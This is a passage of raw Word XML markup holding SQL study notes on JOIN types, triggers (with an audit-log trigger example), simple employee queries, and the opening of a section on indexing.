          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5193485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matched Rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A4C45D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right table are filled with NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B20476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left table are filled with NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="64179EAE" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="505E17B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4C06CF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left</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="252052D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right</w:t>
            </w:r>
            <w:r w:rsidRPr="005C1C9E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="7BA6BD49" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792F74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Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C93F1B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42ACD65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RIGHT JOIN B ON A.id = B.id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46B88DE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127F46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92"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="7A8AA1A2" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D7594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488AE1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r>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="436FC6C2" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3367AD6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7505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FB59DE" w:rsidRPr="005C1C9E" w14:paraId="15E8A798" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3228CC8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23B3E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r>
    </w:tbl>
    <w:p w14:paraId="197221E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28"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="445D0DBC" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8A55E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80F773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4EF10EC0" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40E4CB3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4543E9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4298B058" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10CFBFE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D02E1A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76B1FB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JOIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B68E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A.id, A.name, B.dept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C40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184BE92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B ON A.id = B.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333D4D1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44"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="5423ED1D" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C290B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035B86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EF58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15CD1838" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="014C429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5A422A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4D3360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38716B7A" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7826D61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04F0F21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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A8481B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7234F5E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JOIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB2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30A2AF7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6C324B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RIGHT JOIN B ON A.id = B.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60766EB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28"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="612C54D8" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A815A09"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F67EE0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2123457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25563A1B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CBFDD4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798BB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95CB9F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2304BCDE" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77FFD25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C34ED6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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05838EA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3A823F81" w14:textId="5F04207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3245" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBC76DC" w14:textId="6FB97FDE" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="003C0565">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="786" w:name="_Toc197868000"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Triggers</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="786"/>
    </w:p>
    <w:p w14:paraId="768C488E" w14:textId="36612168" w:rsidR="00311F1C" w:rsidRPr="005C1C9E" w:rsidRDefault="00311F1C"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Triggers</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SQL are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>special stored procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically executed (fired)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in response to specific events on a particular table or view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC8744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4CD04BE">
          <v:rect id="_x0000_i3246" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B21E25E"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en do Triggers fire?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF625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Triggers execute in response to events such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717508C"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INSERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479ECB8"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UPDATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B0A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DELETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5C86B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3B9EC8">
          <v:rect id="_x0000_i3247" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA910CB"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Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF60E5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FORE Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9019B5"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before</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the triggering event (INSERT/UPDATE/DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C371E41"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validation or modification of data before it's committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099073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TER Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9AD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after</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the event has occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CBEF3"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logging, auditing, or enforcing business rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187634EA"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STEAD OF Trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for views)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D8B72C"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places the action of the triggering event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7D5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ommonly used on views that are not directly updatable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C174CE"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42471184">
          <v:rect id="_x0000_i3248" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAACDC3"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rigger Example (AFTER INSERT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4A44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CREATE TRIGGER trg_after_insert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E398B"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FTER INSERT ON Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F323A80"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB1267"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2EFD9AF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AuditLog (action_type, action_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F9DC5"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ALUES ('INSERT', CURRENT_TIMESTAMP);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C481C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18B4A39D"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B77BD17">
          <v:rect id="_x0000_i3249" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F58777"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Use Cases of Triggers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5ABA5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forcing business rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AC95B2"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diting table changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F79693"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 value updates (e.g., update timestamp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D582EC4" w14:textId="77777777" w:rsidR="00311F1C" w:rsidRPr="00CE4B95" w:rsidRDefault="00311F1C" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Synchronizing related tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F0EA6" w14:textId="3ED67F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3250" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056D1F3" w14:textId="003B3235" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00124EB7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="787" w:name="_Toc197868001"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00B8001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8001A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>et the youngest employee from the employee table</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="787"/>
    </w:p>
    <w:p w14:paraId="2C5CFE10" w14:textId="1D80505B" w:rsidR="00EB14F8" w:rsidRPr="005C1C9E" w:rsidRDefault="00EB14F8"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get the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>youngest employee</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the employee table, assuming the table has a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>date of birth (dob)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> column:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B6609"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2CD61FEB"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2D933A23"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042A1A4C"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ob DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3F9752"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ETCH FIRST 1 ROW ONLY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489D0A18"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lternate using MIN if you store age directly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99045F"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48499F8E"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4B7AEBC4"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WHERE dob = (SELECT MAX(dob) FROM employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3AE98"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MAX(dob) gives the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>most recent date of birth</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, i.e., the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>youngest</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0BA9B7" w14:textId="3201B437"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3251" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05821AAC" w14:textId="4ADB305B" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00904FB6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="788" w:name="_Toc197868002"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="00EB14F8"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EB14F8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- G</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>et list of employees from Finance department</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="788"/>
    </w:p>
    <w:p w14:paraId="17261538" w14:textId="6FC4C68F" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D5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SQL query to get the list of employees from the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Finance</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> department, assuming you have the following two tables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08C9C1"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employee_id, employee_name, department_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B30C4BD"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department_id, department_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F82F0B" w14:textId="77777777" w:rsidR="003F3D59" w:rsidRPr="005C1C9E" w:rsidRDefault="003F3D59"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1431B58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id, e.employee_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520DD189"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772C5845"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JOIN department d ON e.department_id = d.department_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4357A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WHERE d.department_name = 'Finance';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F257B42" w14:textId="48E06CA3"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3252" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95478F" w14:textId="0C828721" w:rsidR="00205C15" w:rsidRPr="00CE4B95" w:rsidRDefault="00380657">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="789" w:name="_Toc197868003"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Indexing in SQL</w:t>
      </w:r>
      <w:r w:rsidR="00205C15" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="789"/>
    </w:p>
    <w:p w14:paraId="36850D35" w14:textId="142532B1"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Indexing in SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a technique used to improve the </w:t>
